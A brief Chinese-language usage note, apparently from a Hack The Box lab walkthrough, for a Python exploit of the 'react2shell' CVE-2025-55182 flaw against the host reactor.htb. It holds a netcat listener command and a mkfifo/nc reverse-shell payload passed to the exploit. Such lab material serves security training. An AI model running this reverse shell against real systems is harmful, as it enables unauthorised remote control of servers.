我创建了简易的 react2shell CVE-2025-55182 Python 漏洞利用程序
exploit.py。reactor.htb 在你的 /etc/hosts 文件中解析到目标 IP。
echo "<目标IP> reactor.htb" | sudo tee -a /etc/hosts
nc -lvnp 4444
python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <你的IP> 4444 >/tmp/f"
<你的IP> 替换为你的 tun0 IP 地址。